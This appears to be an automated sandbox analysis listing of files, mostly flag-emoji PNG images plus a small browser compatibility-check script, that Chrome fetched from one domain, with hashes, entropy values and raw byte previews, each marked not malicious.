                                  Preview:.PNG........IHDR.....................PLTEGpL$Y7.U2.T0.T1.R/.P*.y..{..y..y..{..{..{..v~.z..rz.mw.fr.`l.\j.Ud.O^.JZ.IY.GW.DT.BR.?O.<L.:J.8G.4D.5D.0@..>.,<.*9.'7.%5.$3. ...,..$..(..>..B..Q..Z..[. ]."_.$a.&b!(e"*h%,i&.k)0m*2p,4r/7t29w4;y6>{8?}:@~;B.<C.=D.5A..Fh.IX.J[.IY.O].Wd.GV.?N.xR..E~oFFGj)/f&-\%*T)+S./:..:..=.3B.5C.5D.=K.FT.P\.\g.eo.mt.hp.bj.\e.U_.KY.AO.AO.?L.=b.DSzDp_BuKG{[Ynohf..K..L..O..N..L..K..I..H..E..E..B..B..>..?..;..:..6..6.4.1.0.-.-.+.).).0.'..$.. .}..y...;"pD..2..2..6.,.8.:@.Rh.7,.U#{H.k@.^8.d<"rD"uF'.M(.Q'.U#.N1.S0._..[3.c4.e4.g6.i8.j9.k9.l0.m[.bx.]..U..U..R..O.U..Z..`..i2;..o<"$YI*Y3!W.-<.'6G.Js%G./?.5Cd2^?7\RMPga@.-..7..9}.;.*Z.?0.d..a+.^(.\&.Z$.X".V!.T .R..P..N..L..J..H..F..E.~B.w>.k8.c4.^1.S-.L(.Y2.X4.Q-.N+.M).sz.px.ov.ry.nv.kr.px.fn.LV.nv.v}.x..^:.\8.Y5.T1.V2.S0.Y..u......tRNS...Ha0...[1................................~~........................................bb.........................................................~~bb..............................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4787
                                  Entropy (8bit):7.942972356299022
                                  Encrypted:false
                                  SSDEEP:96:spYoqmlL93hTHdk9f+e+8ZzUD+wIQFU+dbRJZaVK+RSIZU91:eDj3hjdkAKdmIAFVRJvIZA
                                  MD5:478DC44DBC2913670DB99226A735BDCB
                                  SHA1:F68D353EF65AED964A2A79E4174538FF5B1D8196
                                  SHA-256:5FFAE5C9C245C9476F19CB20C0631249AF433FC41A05897A31312524A2AD0185
                                  SHA-512:B438B80212ACEE1E88CC87E228753C8604E35E5E2E96FFA7090F42D115C18C167662CBB56382106FEF6D303776CBA7774E5F74678E9E386693953CD3C0B132F0
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e8.png
                                  Preview:.PNG........IHDR.....................PLTEGpLIw....4dy......9i.6f|.....6f|7g|...O..F}....6f|r.....5e{8u.Q.....3dy...g..<l./^t.....:j.2aw...0`v=n.......<l./^t.....1awj..................................:.....8.....8.......7....8..)..8..8..7..6.....6..Q..5.....4.....1...............y..y..w..x.....w..}..u..q..v.......6v..s..s..y..u..r..i.....q..s..z..p..o...Oq....f..n.....n...+x..l...p...l..k..k..a..v..i..j..o...m..i..{....h..g..f...e..{..e..n..Z]..f..c..c...b..c...`..o.......b.._..x....c..a..^..q...0].._..i..`.....\..[..`..[..s..\..Z..g..{..Y..^..Y..Y..V..h..W..r..X..\..U..V..T..U..]..S..U..S..S..m..\..R..S..Q..Q..Q....P..U..b..K...0M..U..M..I..L..R..H..K..O..}}~F..N....-J..B..H..A..D~..r'lmn;z.Bw.8v.8t.?q.bce:o.:k.n`+4j.5g}1dzVVV/`v-]sWM&JJM?>986.++*&&&$$$..!.....#....."....bn....+tRNS.....%$13:APTccdemwv~......................4tX....7IDATx..O.%.u..{.U.O...{$Y.8....v..l..dc.8..vb9.F...N.$.`C.!YXx"l.0!!....&........XA.bI#.f..3=...W.....+....e.5..uwuuwU.W.w.z
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):7238
                                  Entropy (8bit):7.949906568964949
                                  Encrypted:false
                                  SSDEEP:192:4IAR1Utifpbuce14+9jR88QVWF56z9R1i8CP08SMLO/P/MP:5uhbPe14868QVWFO9eXis8cP
                                  MD5:6F166FB64D79564494EF12EBE2A6E77F
                                  SHA1:99469206225F5FEBEA3947E0AAD1D4463B97A0E6
                                  SHA-256:D3F6FEDB94228B2A9138636C9A7B95807387D6590769E3C4DFE77511C58EB83F
                                  SHA-512:F73CF50EF8D5CE3DCB5A7AD176E5AA9DCA4EF0C707192F61193AB671C370C016DE5DC39EA4F5D80D2CE6D82FEAB3C2CC3EDB2EE1C292295D93695D20619570A2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..8..11_..N............|||.......XS....:5.91.UQ.!.....ec.....................C>gii.gh._`.fg.gg.mi.fg.nnwvssvvvyyyXX~.{wtstuuuww|mm~yy......V.._..Z..]..a..e..j..k/*b.0-;6]..n.71.;4......./&.) .&..!.zg7[NE eKC\qbO.&.".rG..>..2-'L..!..S.{u..............?4.D9.H>.LB.VM.TJ.QG.LB.H?.D;.A8.=3.7-.3)./&.-#.(..2).4*.6-.90.;1.>5........~{K?>:2F2.Hc.?.|..{t.kc.............rj.......aX.RH.ND.YP.XO.UK.ZL.EP{2TP1nSU...n..r..x!#v%&x+,u11s88w@A{OO.HH~TT.]]. .Q..&........................hX?.}8...........................................................................................................................................}||xww_TZ..x..:..A..H..Q.HC.PJ.TM.vq.ZS.e_.rm.]V.=4.qk.c].A:.RJ.IC.c[.kd.....yu.je.ZR.}.{...NEee..B:.80.H?..mw.q...1tRNS.........Fe.ss.s........cA&......aBo.......0"..s.@....IDATx^..IN.@..QD...c..@`VF.|....y..8T..JPV .H.....?./.B.!..B.!.R7$.p...N..B...#a..-....`..8..s....d..a.....D.L.......A.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5666
                                  Entropy (8bit):7.942054749739916
                                  Encrypted:false
                                  SSDEEP:96:5nT57JVAW1CfPLmYh5PY8oVT68J0x30S9GljI/vMjoDmD5oFMKvAYYvvY/HdN:BV7JVAWcfDmYhy8oVT6cI/vSt4MKvAh2
                                  MD5:AE9CC76F78D6663EF7EFE2F1BEE3A31C
                                  SHA1:714C38D6F3B5602CBFF99A7E0547FB1C262E33A8
                                  SHA-256:E64841341B3BD96C9C65AE99BC92CCEA09364843621DD6CE51201CA396C37AF5
                                  SHA-512:1626AA1B931B49E81B7B3D4EA213A5A3C00A9E7C1CD2CD58EFF3149C2E8B3AB9D9EF07BB4285975328CE30FB101FCA7C3D28D2D14DA2D0ED30E331FCE2D8295D
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.Zd.ku.nx.nx.q{.gqs...\g.cn.s}.ku.p{t.!.q{.cm.gq.fq.Yd..=t. v."....7D.CN. /s..l..x.$.q|t. s. q..n..q..r..r...hro..z."..&.6H.3E.-@.O`.>Q.6J.-B.+@.&;.';. 5."5.(;.8E.J\.DX./D.(=."7..5..2../..-../.eq.Vb.?S.:O.7M.0F.+A.#9. 6..3../.....,..*..).'9.%5.N].4K.&<.$;..5..'..&..%.!6."3../.KY.$3.1H./F.-D.,B. 7..4..)..$../..-.3I.)?.'>.....1..0.....,..+........*..1..!..(.,C.."..(.3J.!8.."..%.&=..-..).*A.#:..3.....(..&./J.1H./F..$.6I.+K..+..'._?.GG.!M.n?.h?.&L.UD.-D.)@..*.[B.?G..M.6..7..O..4..1.s>.:F.3J..-..,..3..S..'.dA..Q.NF..1..-..%..)..*..#.:..S.9..%.$;.'D.x;..+..!..&..#..2.+C.N@.."..%.......#F.V=.8../..&.}<.'>..#..I..#..$..'.%;."9..5..4.."..F..".....1..D.E?..J.m7.g7..$../..1..$.....&..'...{....*|.&z."t..q..k...O\.IV._l.Ve.CT.>O.=M.CR.Yh.Td.M^.GX.q{.lw.]h.Wb.gq.\h..1....)tRNS...8Pew.Y%........g..~.cx.....dN-=..l_?1......IDATx^.....0..A..n.8`.>....0..@...`.Q...........f..L./rs.....Zs.{..=C\../.R...4.Pj.Z.....:kJ#..0.4X.(.Y.I..\..."...\p..D%.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (413)
                                  Category:downloaded
                                  Size (bytes):2544
                                  Entropy (8bit):5.119071748552234
                                  Encrypted:false
                                  SSDEEP:48:p8izjb0Kn4YK+FH7X+IDxMp8GQF/7whyls5BhuezEzD/VzDatJzVvWz1uz0yAzJB:p8izjb0Kn4/sHaIDxMp8GQNo5kEtXvQB
                                  MD5:DA7800EA928A021F2539AB41E6F2323E
                                  SHA1:0141DA1DC85CA8F34212F3DDE2FAC9BF61F5ADB7
                                  SHA-256:15C24EC2B4CB94F24E66750F09E7071E5659E20A5ED926F69F565E20A81027CF
                                  SHA-512:228CA1C1F1FF8DE139EBCFA7B084BC40D467A56DDCCD103CF02A3FA26BA8C1B4D1961904511198E2FB6797837414BB3C09FC9F0902C3874F2467F279D526F0A9
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/compatTest.js
                                  Preview:function compatTest() {. var hasPromise = typeof Promise !== 'undefined';. var hasWebSockets = typeof WebSocket !== 'undefined';. var hasWebCrypto = window.crypto && typeof window.crypto.subtle !== 'undefined';. var hasObjectFromEntries = typeof Object.fromEntries !== 'undefined';. var hasResizeObserver = typeof window.ResizeObserver !== 'undefined';. var hasCssSupports = window.CSS && typeof window.CSS.supports === 'function';. var hasIntl = typeof window.Intl !== 'undefined';. var hasDisplayNames = hasIntl && typeof Intl.DisplayNames !== 'undefined';. var hasPluralRules = hasIntl && typeof Intl.PluralRules !== 'undefined';. var hasNumberFormat = hasIntl && typeof Intl.NumberFormat !== 'undefined';.. var isCompatible = hasPromise && hasWebSockets && hasWebCrypto && hasObjectFromEntries && hasResizeObserver. && hasCssSupports && hasDisplayNames && hasPluralRules && hasNumberFormat;.. if (isCompatible || (window.localStorage && window.localStorage.getItem('tt-ignore-compa
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5163
                                  Entropy (8bit):7.830372906130133
                                  Encrypted:false
                                  SSDEEP:96:Ecp04Eplvw+WA5WEgh37SrhaVoZUpznSrfr5zvyiP2DmgNRD3VSDmWubu:t04ekNh3erhQVSrfpR2DNRlSSWuq
                                  MD5:B9BFCBBDDADB1AFA53895A69A15B16FD
                                  SHA1:4F1D4CF554CCFB18CFD42269636CD1430A617CCC
                                  SHA-256:D3E78C4229BBD62760F211DE2A354798130BE52560D950604195304137A29F75
                                  SHA-512:C737BE2CBF23AB5069F8D77A9C65C6D3B62D635504346CE06A5E3A8A5A08B0BA9B94B0892E379526C7CF69917E68ABE44010F6A8601777E13157E2442CE92349
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.L5.L4.N6.U9.[=._?.`>.^;.]:.Z8.Y6.W5.U3.T1.R0.Q..P..L..F,.@'ex(.P+&vSJhvfvh.O..W.......U..O..F.x.h`.N.hU..G..>..F-yT.nU..E..@..C..C..>..1..KL.G.aM.\H.YBw.0.U@._=.a?.dA.gD.hF.kH.lJ oL!pM#qO%sP&tR'uS(vS(wT)xU(wU.X.q..n..g...B..I..>.q..v..m..f..^..W..P}.Hy.Cv.;p.Jv.V}.`..i..`}.Tx.Gq.?l.7e./_.'\..........................................;z.0s.6..R4.I2 W=.aC#iI$nM!eF.\?.Q8.D..@,.=).9%.5!.0..,..4!.:-.<#.6$.6$.5#.6$.9'.9'.;).0..l.}c.na.lY.l[.zb..j..s.........$.!... .!.'.$.&.+.,./..1..5..8..9..=..>..A../.^)g..`...s..&..4..5..)..H..a.P.@.8.."......@Pr4.K76j5.Q;.,b#Gr.R|6[.@e.Gl.Qr.\x.g..n..p..Hf..j..n..=.i}..u..v..r..t..o..v..k..l..]x.Wr...m..J... f..m.=u.<t.;s.;r.8p.7n.5m.3k.2i./g.-e.,d.*b.)a.(_.%^.$\."Z.!X..V..T..R..P..O..M..I..D~.=r.8f.5b.6c=.F*....tRNS.c....................................................................................................................................+Eb...yt~.h.................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4101
                                  Entropy (8bit):7.930549420303185
                                  Encrypted:false
                                  SSDEEP:96:/S0D21e+Vvxh55MAIwBxTdlU/KDeTKGYEYZb1:/Se2zVpb2mBdQNrk1
                                  MD5:CE78B4AA3A6846060FA0400C7AACBE38
                                  SHA1:F1675097AD2EBB4F5E91D044F5839D776F3E2B1E
                                  SHA-256:6533E6964C7033ACF627B78D9EB394669F8CAE0C1700D8187B2AD51C2102E6C2
                                  SHA-512:D895F221C7E64A25F5039D47C84FD5DF8F31B9EC467595963D998592E0210BD3E870B901555FECDA25E5396F786F888CA2873349C49DCE650D3E33AD3AB105B2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...i........g.....e........i...........{}..$k...#>...q..c...'F$A]...k.....i.....k........j.....m........l...........d..PUw...........................................................................................................................................................................................................................................gkm...TY[}..UY.DIPs..6<.14.6<.,,.5;.5;.39.4:.28.;E.17.06.28.HZDh../5..4.06.,2.(..+1.)/.*0.!"..3.'-qIi.'-.%+2_..8I."(1\..+0.d..#).!'.$)....Z...%.#(,X...%.(..^..."*V..#(9Qs..!'U.'S.....Z..&+%R.......MBg.. y0H..$$P.....!&"O~...."&!M}.......L{.......L..!$....Q..JzH9].Iy.......Hx....Fv.J~..#&Ce....Eu.Cr.Bq}."....Ey.Ap...36[.@n....?m.>l...t...=k{...At.<j....:ip...9e;(Co...5aw...5k.3[i....SE.$c...+`.'H.">.....*tRNS......%07IH[`ccbeijwx~...........................IDATx....]U....[......T..-...h..x....Q.m..Bo b#A[.D..h.R..@tt29.{_g.^..3.4.$.~..>.......................6.<..*...V..H..vX
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5814
                                  Entropy (8bit):7.944946438244119
                                  Encrypted:false
                                  SSDEEP:96:sNTWvRPd2XgA7cMk8Qbg7owfyjCjQv+dPfNmokziBbEngbvRm7xb80Yzjs:qAd2XgokRbg7owqjCjkAPYpiBAnzdYY
                                  MD5:6C5D185BA5D1F0F359CA28468BC0AC57
                                  SHA1:B9833F9A89ABDCC89931B2AAE4B28C001A5B01FF
                                  SHA-256:C67035C3351B1D734157BD45CE85F51C1B5CA8B6FFA213DBDC896D72E9D57A8D
                                  SHA-512:F3DEB0D44FE5BF448F0275042B877FF4CC2A81256D413F60E96A05B8F1EBCB11B0A1686EF4F8AD6BDE3B1E4D1E3E5DADED36F3332D01AFCF84C4EF27B142C910
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..L..7hd...;sg.VQvqk...?..5..6IDj..5.......0..5..5..8og....if...:if...6..6..5la.mj.uh..hi.KKkd........foMJr[X..}.....%.{<P2&w..O..P1&v."s1%u..Q..U, q..].....W..M*.o/$t(.m.._..S.&%..b..Y........>#.h..v""z&%|..S.....9..D....""..J(.m..?.....b..7..\..-..5..f..J.......................E..S...........m..F..r.0/..R!.R........0...**x..d..J.........44..........ww..&).33....A@...................)...........bb......!<..=<'%w__......."!12T...jfa..Y....LH.....C......ZH.....G.........q....f^X.vm].tt.....w... ".K.vxv..+E-.$^y.67od.|t#W<....D.......S..] .`US......]......."q.zR..Y-P:.7..l.....:n.........]........t...vIEv;4t*!hb_.@9kSNx.ZW(.bA:z3+h3$clj.KG.C?.QN....XW.$.[XS......-"p7-w..V..[.wv.....c!.f....ec.....` .Z.....Z.JJ_[......_..&.k%.i .^....RO1%t.....M..^...*tRNS.c~....8......~./f.f..O.v@S.|..$e..{.....t.W...;IDATx^...N.@..a..{.`cB...."...d.{O/......+..,.7..~..Y[..!..B.!..B.mj.i...!.a.....J..7...P.+pm...Q.OX..*...Tl8.x.LK_..t..e..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4034
                                  Entropy (8bit):7.794088396866598
                                  Encrypted:false
                                  SSDEEP:96:6scMqdrh3nUd0eAXTtM7mXrB3AIOls1bYVf5rJS1:qBh3qyZM7+APFBrJU
                                  MD5:2692F0F3D1F3C495BF5E543B5BF16493
                                  SHA1:F6D524116D562DBDEEDE403E11F8BB090C97AC5D
                                  SHA-256:6DF04945835842D20A038C494D0BDC9A6CE962D8CFA09AB65E67734DFFBD3824
                                  SHA-512:954CA3496AD2CEDC5FE29208A7151706E29476459586161237CD897B93EFB1AC6B3889DA4A6B0DC0302587111A4C135DFC77551262E13DBB573A1CF5D0FDD9A2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpLlSc.lq )E.in.+I.sw.*H.fk.+I...{'/)>d.v{.)H.gl.(M......{v}q!&d..c..b...nr.9>.)H.sx.,J.ns.]c.,K.(F.uz.$B.lp 0O.rw.-L.v{.hl.#A.@E..................................................................................................................................................................................................pw.vzs...qv.lq.hm.ek.^f.gl.`gdz..Za.af.\b.T\.U\.]b.OW.T[Tn..W\.IR.IQ.QW.]`.KR.CL.MS.>G.BK.=G.=F.>H.FM.;E.:D.FLBb.Aa..;E.8B.?G@`..6@?_..5?>]..4>?]..9A.3=<[..:B;Z.:Y..0:.,79X..3;..8./8;V.7V..,65T..2:.*47R.3R.2Q..#/.*3.(2.,40O..(1.&0.4:/N..%/3M|.*3*M.-L..%..#-+J.,J...'.!+.#,.Hy0Hs.(0*H.. *(G...(..'&E~+Co%C{..%#B|z%,..#..."Az.A..."!?y..!#?r..!(=e.>w#<j.<u....;t....:z.9r%8\~...7e.7k#4T.4d.3\k..s.. 2R.1r.....Z.-Nf..b...)I.)R.(N.(i.$F.!A.7.`....tRNS....),:BUTcccdgk}~~~~~~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4161
                                  Entropy (8bit):7.904318181820394
                                  Encrypted:false
                                  SSDEEP:96:tLhoahmE8P27SBenKJpz/EiJZAWyLFr4/xWgHr:t9ogmE8PxxDEoyLFr4/xHL
                                  MD5:9CCE96440206C81DF2D7411DAF897481
                                  SHA1:85BEB1FE03CA0148A15478CF9E96E18921A85F01
                                  SHA-256:58544FABF399B60F55EEFF3782A04A36E733C64F2035FBC9DE6F2AF4966699D2
                                  SHA-512:9020D879714CEB0888EC08E5DD1B6821D4F690247B6DA8C96B4C8A4DBF3F16A27D70E7AEABCDAF23ED26FE260A81F998DD90E61FE3DE2946AEA3D5A36531F931
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1e9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL:^T.;0k...=1k...>3l...;/h..t...<0.<1n...<0[.ur..#UG.G;q...8,6eXZ.tm.."N@.>/h...B7.6*h..u..k..Dma.=2p..^.x.;0m...@5s...7+i...B7.6+o..9dX.B6u...6+b.{.5*q..t..p..l..h..g..a.._.~Y.}d.}Z.{.L"R.z.T.^.x.G..\7.V0.P).L$.P).O(R.w.O(.G..O(.b?.O(.I!.M%K.v.N&.N'.K#Z.u.M&.eD.L%Q.s.K#F.s.O)lw\.J#|pS.jKJ.r.I".Z6.B.S}q[{a.H!A.p.G .D..G!.F.=.nG~lNzm.E.fqV@.k0.p.:..C..N)8.l8.k%.t0.m7.j.A...v.F .;.Exh.X5'.p5.j.=.5~i.?.3~hPrY5|g3}g..r}^?;xfGrd%.l1|fcgK0{e>td1zd/ycSjO0xb1vb-xb#|g-wa..m,w`2t_,v`6q_+u_,t^>k])t^.}i.q\)s]#u`1n[(r\&r\'q[.xd'pZ.lY%pZ(nY%oY.t`%nY)lX#nX$mX,iV"mW$lV"mV%jV#kU!lU kU.dT%hU!jT.jT iT&fR hS.iS&eQ.hR.gQ.fQ)`P.eP.fP.eO.dN.aN%^M.cM.bL%[K.bK._K.aK.`K.`J._I"XH.\H.^I.^H.]G!VF.]F"UF.\G.[E.[E.ZE!SD.XD.QB.UB.SA.N?.R>.Q>.I<.K<.N<.E9.I8.B6.F6.A4.?3.A2.@2.</.>0.9,.6*.2&|M.....4tRNS......$-19;?KQWXbcdihlny}~...........................w,t....IDATx...Yn.V......D.e%..te.Dw.5t..V_..M..mY..T.............=..{....................4_7..V(.JI...>F.'._.&..ic2...9..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4378
                                  Entropy (8bit):7.916447994029466
                                  Encrypted:false
                                  SSDEEP:96:K6xcTi9piE1Beg2KGq9CAsOtIHcNRQgkD/TDbzHItT0yKi8KqnC:SiTS0CstgcE/THzotuKqnC
                                  MD5:9A98C11B291C5D9D87F49FF4481022AE
                                  SHA1:17E20B036A8CD18532D64C6E752A38635F3A65AA
                                  SHA-256:39BA644834B625A9C5D9A36293F40197C513EBBDB4E374866113ACE4F292212E
                                  SHA-512:B55F7EC9FC2BC1EE49A5D3A8C771C91A2D085887767DD36FA8174B8DF33A3494B49620C02F637BC7642476561880CB6214D8EA19CE30EA17A64AB742F3F36189
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.$9.u..o~.r..t..n|.ix.o}.^m.fus.+.?R.mz.ix.ds.hw.fuN..'e.,i.E{.d..O.._..h..w.&f..g..d..g..r.!.pz.y.u.%.H..ixw.'.u.z.).*9x.'w.&e..v.&x.(x.'~.-t.$o....".%D.#B."B. @. ?..=..<..:..8..:.-L./N.1P.3Q.5T.8W.9X.9Y.:Y.:Z.:Z.:Y.#8.$9.'>..9..7..5..2J..\..V....3?..0.."|..u./z..n...3..4..5..1..#./]oD~EW...4..1...N..>..3...d............................n..>../.........r..y.....|..~..........".....".."..$..$..%..#......c..,C.3O....l....w....... 9qe.Wo.Wy.......l..y..u..s..p..m..k..i..g..b..\..T..K..H.....G.MC.O.Z......P..8X.7V.6U.5U.4T.2Q.0O..N.,L.*J.)Hn..t..}. ..)..-..9.'A."5.....0y.&..'..0..4.!<..2..0..-..)..$..".'F.jz.Rj.C`..L.2N./J.CZ.`t.=[Q..>w..'D.,I.7Q.5S.Tg.ar.+C.'?....'D.%C..>..;.r..8].#@..<..7h..^...Eb.<W.Ob..5.Zj.Yo.Ke."A.-H.'F.7V.F\..3]..`o.'B.v...8.*I.......3tRNS.c..6e.XI*mwUz{......U&..9b........~w....,Eb......~5.......IDATx^...N.P..Q..c..!@....!...k.;..^...\.$....Y.....?[...B.!..B.!...!$...D"Q..".r8,lF.,...N...US...1).O.A...6..yf>...h
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4588
                                  Entropy (8bit):7.919630401586666
                                  Encrypted:false
                                  SSDEEP:96:iDmhAry1fEliRYkj/q8NYKfCRwrKx2/eabTYTym/BKB7YfZMquXwP2wxYB5FioUI:urS6a+AYKaWec1TYT9ZMlXwOEo5FPN
                                  MD5:8319321208DB2E33135CD0311CA9AA61
                                  SHA1:05AFF4D62E2BCC14984A19AE428B882059662EC7
                                  SHA-256:6543E4470B096DA26E6B1059FCF7193C07B8C10B7DB2D611B795ED8C489C8F92
                                  SHA-512:F26A83CA03776FB8A2948FD68A8A0AB76710DE031FDD03A413952F2D7776C617F57F91795446919447F056AD7FD1005DDC4378FCADA850D860BB9D5D36651CD4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.a<..6.. .k..Urg...W9.xQb...Y:g...X9j...X:i...X9.X>k..a..\...S5b...S4.\A.^?.gF.V7_...P2^..^..,s./u.L....T.)U...$.|%.~%..%.......5%.}%...$O..G..3.!L..1..;.{...9.z......Z...../..W..K..s..<.....X!.x..I..\..^......#.z.~.!....d..q%....6.....v.}............B.#N#..#.{..C..E.....>..a.'S..A.....m.....l..a..j.....=..h..d..^..3.yQb....>.qE..?..5.. ..V..R..g:...}L.j.!.v..H.aA..o.S3.]<.%QH....Z.X7....#PR...a;..`..2..E.w.Y..]..i...eDS....d.f>..:..?..K.......~TC....<(....A.....#.qL..f..(.....*F....)$..7....Z.t.V...~.I......N/....kH@.. .o/..&.u....q..j..7.Wu.q.7....P.i..kB..b. P.a......).wJ*..0w...d.._......@a....Sq.......i..Io..|.4].=e$..?|\....Y{.....j......;...Kd]X.......QsZpBi.'B|sf._`.d....z.:IcM..T....t.]FE.S.cq.`.n.7\W.........Pm.^...GO.r.5RMLs8_.......*e.:.q."Jct-=...$tRNS.~c~c~..c.,8..Ee...T^....dpw.$...c..Q!...wIDATx...k.p....w..D...A.w.C..8u..R......7Wq..z...M.5 !.....v.c...../.b.w^..W.......r...x<.....x<....}..DI...IH....HRJ.....&..:.c
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4378
                                  Entropy (8bit):7.899556731715149
                                  Encrypted:false
                                  SSDEEP:96:7BP8cYkpX1qVoR/dM8SNX3ZN49Wx7P1glV9UGaRKdrcZI3AiB:xkk522U3Ec9glb3aghwiB
                                  MD5:A630FE243F5E7883D5EE6BB5B90FBCC1
                                  SHA1:74D7C8EE525B804D70CF0A55DC38F68E6A91B0C6
                                  SHA-256:FA0C38499D039D786AC590C97BCC7222090D1BFBFA40C11861EC706D4C60010F
                                  SHA-512:B7B6DB5D5EF4B204D1D4B31278EB66FF972A93CDE6B0126CB507BFEC16AB36799D37BEFF3138015D5CD4E75B60E13A01087676AD4A87AEE2FAED2BAA364F9F99
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.N7.]t.%.ar.#.`s.$.hu.&..Z...4}4.-5w '.em.......".t..e.u.%.as.$.dq.#y!).in...`w (o. .e.j{#+..Ym....H........................................r...........G......%...&..$.....$..$..+..5..".. ..@.....*.............=..*..L..........V.'...<..,.d...K.....`...$...2....8..Z...C..........X.#.....E...3.....R..o.n.........C..B...t.`._}.4.......3...e.GK.P..$R.Qu..O.N...F.NX.J.an...L.LH.JI.I...G.FV.?.xWE.Db.?D.Cp..B.Au.I....S^;.A@.?=.>=.<.hN.HW.vH;.:.GU.GU=.<9.9.FT.DS.VL7.7.DR@.7.BP.>O.x./.54.4.BO.?Ml.12.2;.:.t..=K1.1/./.7I.]?.?L.:H..-.8F+.+,.+:.6.6D.9F*.*.;G.3Ajm1.-A.2?.K8|_1.2@./>(.(.9C./=5.2.2?Pr).,;3}3.3>.,:.*8&.%.%9.O0.4?.(7c\5.+8.'5.+6.$2./;.$2..1"w".09.!0."0.,6.!..&1.i..*3..*.#-2W..&...'..&~%,..#{.'..!v."r..k..f......&tRNS.....%19=PWbbbdjj}}~~.................Yv.....IDATx....e.Y...z.{.......2..Q..F....^.a@.1.s..^.A.[/.W........Q.".....1..L.22.33m.bg.....N....Z...k.[.S....z..9.jh.......h.R..x
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5238
                                  Entropy (8bit):7.866528732478047
                                  Encrypted:false
                                  SSDEEP:96:hvamI+1iyiPsGErggdQapZDMC91HMG10AhPiifSb51jjpRuougGr46XAKwz9NRtl:ZamdpiPsGE0gBzDMC9aG104SV1np0cCU
                                  MD5:A5291D8CD7869D5F421671BE8FFE7D24
                                  SHA1:46B976B9BACEDCB108E670BF12816A40A1CF5DEE
                                  SHA-256:3DC9C35CCB175C0905D85154656921BB5D055B654040B630B8DE03F12D47384D
                                  SHA-512:3C19DB3EC1C9A7A124624693D55AC5E72CACAD29C154CB7BB4651FAF7A45EA1D4A16821A2BF05BB7CEE6D9FFA0052F22C03C4257584BFAE26C0F26DFC4369D12
                                  Malicious:false
                                  Reputation:low
